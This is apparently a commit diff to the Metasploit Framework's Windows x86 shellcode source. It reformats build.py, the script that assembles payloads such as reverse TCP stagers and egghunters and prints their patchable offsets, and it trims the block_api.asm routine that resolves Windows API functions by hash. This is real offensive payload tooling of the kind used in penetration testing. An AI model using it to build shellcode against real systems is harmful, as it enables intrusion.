sempervictus
diff --git a/‎external/source/shellcode/windows/x86/build.py‎
Lines changed: 125 additions & 121 deletions b/‎external/source/shellcode/windows/x86/build.py‎
Lines changed: 125 additions & 121 deletions
diff --git a/‎external/source/shellcode/windows/x86/src/block/block_api.asm‎
Lines changed: 20 additions & 15 deletions b/‎external/source/shellcode/windows/x86/src/block/block_api.asm‎
Lines changed: 20 additions & 15 deletions
@@ -1,124 +1,128 @@
-#=============================================================================#
-# A simple python build script to build the singles/stages/stagers and
-# some usefull information such as offsets and a hex dump. The binary output
-# will be placed in the bin directory. A hex string and usefull comments will
-# be printed to screen.
-#
-# Example:
-#     >python build.py stager_reverse_tcp_nx
-#
-# Example, to build everything:
-#     >python build.py all > build_output.txt
-#
-# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
-#=============================================================================#
-import os, sys, time
-from subprocess import Popen
-from struct import pack
-#=============================================================================#
-def clean( dir="./bin/" ):
-  for root, dirs, files in os.walk( dir ):
-    for name in files:
-      os.remove( os.path.join( root, name ) )
-#=============================================================================#
-def locate( src_file, dir="./src/" ):
-  for root, dirs, files in os.walk( dir ):
-    for name in files:
-      if src_file == name:
-        return root
-  return None
-#=============================================================================#
-def build( name ):
-  location = locate( "%s.asm" % name )
-  if location:
-    input = os.path.normpath( os.path.join( location, name ) )
-    output = os.path.normpath( os.path.join( "./bin/", name ) )
-    p = Popen( ["nasm", "-f bin", "-O3", "-o %s.bin" % output, "%s.asm" % input ] )
-    p.wait()
-    xmit( name )
-  else:
-    print "[-] Unable to locate '%s.asm' in the src directory" % name
-#=============================================================================#
-def xmit_dump_ruby( data, length=16 ):
-  dump = ""
-  for i in xrange( 0, len( data ), length ):
-    bytes = data[ i : i+length ]
-    hex = "\"%s\"" % ( ''.join( [ "\\x%02X" % ord(x) for x in bytes ] ) )
-    if i+length <= len(data):
-      hex += " +"
-    dump += "%s\n" % ( hex )
-  print dump
-#=============================================================================#
-def xmit_offset( data, name, value ):
-  offset = data.find( value );
-  if offset != -1:
-    print "# %s Offset: %d" % ( name, offset )
-#=============================================================================#
-def xmit( name, dump_ruby=True ):
-  bin = os.path.normpath( os.path.join( "./bin/", "%s.bin" % name ) )
-  f = open( bin, 'rb')
-  data = f.read()
-  print "# Name: %s\n# Length: %d bytes" % ( name, len( data ) )
-  xmit_offset( data, "Port", pack( ">H", 4444 ) )           # 4444
-  xmit_offset( data, "LEPort", pack( "<H", 4444 ) )         # 4444
-  xmit_offset( data, "Host", pack( ">L", 0x7F000001 ) )     # 127.0.0.1
-  xmit_offset( data, "IPv6Host", pack( "<Q", 0xBBBBBBBBBBBBBBB1 ) ) # An IPv6 Address
-  xmit_offset( data, "IPv6ScopeId", pack( "<L", 0xAAAAAAA1 ) ) # An IPv6 Scope ID
-  xmit_offset( data, "HostName", "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\x00" )     # hostname filler
-  xmit_offset( data, "RetryCounter", "\x6a\x05" )     # socket retry
-  xmit_offset( data, "CodeLen", pack( "<L", 0x12345678 ) )  # Filler
-  xmit_offset( data, "Hostname", "https" )
-  xmit_offset( data, "ExitFunk", pack( "<L", 0x0A2A1DE0 ) ) # kernel32.dll!ExitThread
-  xmit_offset( data, "ExitFunk", pack( "<L", 0x56A2B5F0 ) ) # kernel32.dll!ExitProcess
-  xmit_offset( data, "ExitFunk", pack( "<L", 0xEA320EFE ) ) # kernel32.dll!SetUnhandledExceptionFilter
-  xmit_offset( data, "ExitFunk", pack( "<L", 0xE035F044 ) ) # kernel32.dll!Sleep
-  xmit_offset( data, "EggTag1", pack( "<L", 0xDEADDEAD ) )  # Egg tag 1
-  xmit_offset( data, "EggTag2", pack( "<L", 0xC0DEC0DE ) )  # Egg tag 2
-  xmit_offset( data, "EggTagSize", pack( ">H", 0x1122 ) )   # Egg tag size
-  xmit_offset( data, "RC4Key", "RC4KeyMetasploit")          # RC4 key
-  xmit_offset( data, "XORKey", "XORK")                      # XOR key
-  if( name.find( "egghunter" ) >= 0 ):
-	  null_count = data.count( "\x00" )
-	  if( null_count > 0 ):
-		print "# Note: %d NULL bytes found." % ( null_count )
-  if dump_ruby:
-    xmit_dump_ruby( data )
 #=============================================================================#
-def main( argv=None ):
-  if not argv:
-    argv = sys.argv
-  try:
-    if len( argv ) == 1:
-      print "Usage: build.py [clean|all|<name>]"
-    else:
-      print "# Built on %s\n" % (  time.asctime( time.localtime() ) )
-      if argv[1] == "clean":
-        clean()
-      elif argv[1] == "all":
-        for root, dirs, files in os.walk( "./src/egghunter/" ):
-          for name in files:
-            build( name[:-4] )
-        for root, dirs, files in os.walk( "./src/migrate/" ):
-          for name in files:
-            build( name[:-4] )
-        for root, dirs, files in os.walk( "./src/single/" ):
-          for name in files:
-            build( name[:-4] )
-        for root, dirs, files in os.walk( "./src/stage/" ):
-          for name in files:
-            build( name[:-4] )
-        for root, dirs, files in os.walk( "./src/stager/" ):
-          for name in files:
-            build( name[:-4] )
-        for root, dirs, files in os.walk( "./src/kernel/" ):
-          for name in files:
-            build( name[:-4] )
-      else:
-        build( argv[1] )
-  except Exception, e:
-    print "[-] ", e
-#=============================================================================#
-if __name__ == "__main__":
-  main()
+# A simple python build script to build the singles/stages/stagers and
+# some usefull information such as offsets and a hex dump. The binary output
+# will be placed in the bin directory. A hex string and usefull comments will
+# be printed to screen.
+#
+# Example:
+#     >python build.py stager_reverse_tcp_nx
+#
+# Example, to build everything:
+#     >python build.py all > build_output.txt
+#
+# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
 #=============================================================================#
+import os, sys, time
+from subprocess import Popen
+from struct import pack
+#=============================================================================#
+def clean( dir="./bin/" ):
+	for root, dirs, files in os.walk( dir ):
+		for name in files:
+			os.remove( os.path.join( root, name ) )
+#=============================================================================#
+def locate( src_file, dir="./src/" ):
+	for root, dirs, files in os.walk( dir ):
+		for name in files:
+			if src_file == name:
+				return root
+	return None
+
+#=============================================================================#
+def build( name ):
+	location = locate( "%s.asm" % name )
+	if location:
+		input = os.path.normpath( os.path.join( location, name ) )
+		output = os.path.normpath( os.path.join( "./bin/", name ) )
+		p = Popen( ["nasm", "-f bin", "-O3", "-o %s.bin" % output, "%s.asm" % input ] )
+		p.wait()
+		xmit( name )
+	else:
+		print "[-] Unable to locate '%s.asm' in the src directory" % name
 
+#=============================================================================#
+def xmit_dump_ruby( data, length=16 ):
+	dump = ""
+	for i in xrange( 0, len( data ), length ):
+		bytes = data[ i : i+length ]
+		hex = "\"%s\"" % ( ''.join( [ "\\x%02X" % ord(x) for x in bytes ] ) )
+		if i+length <= len(data):
+			hex += " +"
+		dump += "%s\n" % ( hex )
+	print dump
+
+#=============================================================================#
+def xmit_offset( data, name, value, match_offset=0 ):
+	offset = data.find( value );
+	if offset != -1:
+		print "# %s Offset: %d" % ( name, offset + match_offset )
+
+#=============================================================================#
+def xmit( name, dump_ruby=True ):
+	bin = os.path.normpath( os.path.join( "./bin/", "%s.bin" % name ) )
+	f = open( bin, 'rb')
+	data = f.read()
+	print "# Name: %s\n# Length: %d bytes" % ( name, len( data ) )
+	xmit_offset( data, "Port", pack( ">H", 4444 ) )           # 4444
+	xmit_offset( data, "LEPort", pack( "<H", 4444 ) )         # 4444
+	xmit_offset( data, "Host", pack( ">L", 0x7F000001 ) )     # 127.0.0.1
+	xmit_offset( data, "IPv6Host", pack( "<Q", 0xBBBBBBBBBBBBBBB1 ) ) # An IPv6 Address
+	xmit_offset( data, "IPv6ScopeId", pack( "<L", 0xAAAAAAA1 ) ) # An IPv6 Scope ID
+	xmit_offset( data, "HostName", "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\x00" )     # hostname filler
+	xmit_offset( data, "RetryCounter", "\x6a\x05", 1 )     # socket retry
+	xmit_offset( data, "CodeLen", pack( "<L", 0x12345678 ) )  # Filler
+	xmit_offset( data, "Hostname", "https" )
+	xmit_offset( data, "ExitFunk", pack( "<L", 0x0A2A1DE0 ) ) # kernel32.dll!ExitThread
+	xmit_offset( data, "ExitFunk", pack( "<L", 0x56A2B5F0 ) ) # kernel32.dll!ExitProcess
+	xmit_offset( data, "ExitFunk", pack( "<L", 0xEA320EFE ) ) # kernel32.dll!SetUnhandledExceptionFilter
+	xmit_offset( data, "ExitFunk", pack( "<L", 0xE035F044 ) ) # kernel32.dll!Sleep
+	xmit_offset( data, "EggTag1", pack( "<L", 0xDEADDEAD ) )  # Egg tag 1
+	xmit_offset( data, "EggTag2", pack( "<L", 0xC0DEC0DE ) )  # Egg tag 2
+	xmit_offset( data, "EggTagSize", pack( ">H", 0x1122 ) )   # Egg tag size
+	xmit_offset( data, "RC4Key", "RC4KeyMetasploit")          # RC4 key
+	xmit_offset( data, "XORKey", "XORK")                      # XOR key
+	if( name.find( "egghunter" ) >= 0 ):
+		null_count = data.count( "\x00" )
+		if( null_count > 0 ):
+			print "# Note: %d NULL bytes found." % ( null_count )
+	if dump_ruby:
+		xmit_dump_ruby( data )
+
+#=============================================================================#
+def main( argv=None ):
+	if not argv:
+		argv = sys.argv
+	try:
+		if len( argv ) == 1:
+			print "Usage: build.py [clean|all|<name>]"
+		else:
+			print "# Built on %s\n" % (  time.asctime( time.localtime() ) )
+			if argv[1] == "clean":
+				clean()
+			elif argv[1] == "all":
+				for root, dirs, files in os.walk( "./src/egghunter/" ):
+					for name in files:
+						build( name[:-4] )
+				for root, dirs, files in os.walk( "./src/migrate/" ):
+					for name in files:
+						build( name[:-4] )
+				for root, dirs, files in os.walk( "./src/single/" ):
+					for name in files:
+						build( name[:-4] )
+				for root, dirs, files in os.walk( "./src/stage/" ):
+					for name in files:
+						build( name[:-4] )
+				for root, dirs, files in os.walk( "./src/stager/" ):
+					for name in files:
+						build( name[:-4] )
+				for root, dirs, files in os.walk( "./src/kernel/" ):
+					for name in files:
+						build( name[:-4] )
+			else:
+				build( argv[1] )
+	except Exception, e:
+		print "[-] ", e
+#=============================================================================#
+if __name__ == "__main__":
+  main()
+#=============================================================================#
@@ -23,7 +23,7 @@ api_call:
   mov edx, [edx+20]      ; Get the first module from the InMemoryOrder module list
 next_mod:                ;
   mov esi, [edx+40]      ; Get pointer to modules name (unicode string)
-  movzx ecx, word [edx+38] ; Set ECX to the length we want to check 
+  movzx ecx, word [edx+38] ; Set ECX to the length we want to check
   xor edi, edi           ; Clear EDI which will store the hash of the module name
 loop_modname:            ;
   xor eax, eax           ; Clear EAX
@@ -34,22 +34,25 @@ loop_modname:            ;
 not_lowercase:           ;
   ror edi, 13            ; Rotate right our hash value
   add edi, eax           ; Add the next byte of the name
-  loop loop_modname      ; Loop untill we have read enough
+  loop loop_modname      ; Loop until we have read enough
+
   ; We now have the module hash computed
   push edx               ; Save the current position in the module list for later
   push edi               ; Save the current module hash for later
-  ; Proceed to itterate the export address table, 
+  ; Proceed to iterate the export address table,
   mov edx, [edx+16]      ; Get this modules base address
   mov eax, [edx+60]      ; Get PE header
-  add eax, edx           ; Add the modules base address
-  mov eax, [eax+120]     ; Get export tables RVA
-  test eax, eax          ; Test if no export address table is present
-  jz get_next_mod1       ; If no EAT present, process the next module
-  add eax, edx           ; Add the modules base address
-  push eax               ; Save the current modules EAT
-  mov ecx, [eax+24]      ; Get the number of function names  
-  mov ebx, [eax+32]      ; Get the rva of the function names
+
+  ; use ecx as our EAT pointer here so we can take advantage of jecxz.
+  mov ecx, [eax+edx+120] ; Get the EAT from the PE header
+  jecxz get_next_mod1    ; If no EAT present, process the next module
+  add ecx, edx           ; Add the modules base address
+  push ecx               ; Save the current modules EAT
+  mov ebx, [ecx+32]      ; Get the rva of the function names
   add ebx, edx           ; Add the modules base address
+  mov ecx, [ecx+24]      ; Get the number of function names
+  ; now ecx returns to its regularly scheduled counter duties
+
   ; Computing the module hash + function hash
 get_next_func:           ;
   jecxz get_next_mod     ; When we reach the start of the EAT (we search backwards), process the next module
@@ -66,14 +69,15 @@ loop_funcname:           ;
   cmp al, ah             ; Compare AL (the next byte from the name) to AH (null)
   jne loop_funcname      ; If we have not reached the null terminator, continue
   add edi, [ebp-8]       ; Add the current module hash to the function hash
-  cmp edi, [ebp+36]      ; Compare the hash to the one we are searchnig for 
+  cmp edi, [ebp+36]      ; Compare the hash to the one we are searching for
   jnz get_next_func      ; Go compute the next function hash if we have not found it
+
   ; If found, fix up stack, call the function and then value else compute the next one...
   pop eax                ; Restore the current modules EAT
-  mov ebx, [eax+36]      ; Get the ordinal table rva      
+  mov ebx, [eax+36]      ; Get the ordinal table rva
   add ebx, edx           ; Add the modules base address
   mov cx, [ebx+2*ecx]    ; Get the desired functions ordinal
-  mov ebx, [eax+28]      ; Get the function addresses table rva  
+  mov ebx, [eax+28]      ; Get the function addresses table rva
   add ebx, edx           ; Add the modules base address
   mov eax, [ebx+4*ecx]   ; Get the desired functions RVA
   add eax, edx           ; Add the modules base address to get the functions actual VA
@@ -88,10 +92,11 @@ finish:
   push ecx               ; Push back the correct return value
   jmp eax                ; Jump into the required function
   ; We now automagically return to the correct caller...
+
 get_next_mod:            ;
   pop eax                ; Pop off the current (now the previous) modules EAT
 get_next_mod1:           ;
   pop edi                ; Pop off the current (now the previous) modules hash
   pop edx                ; Restore our position in the module list
   mov edx, [edx]         ; Get the next module
-  jmp short next_mod     ; Process this module
+  jmp short next_mod     ; Process this module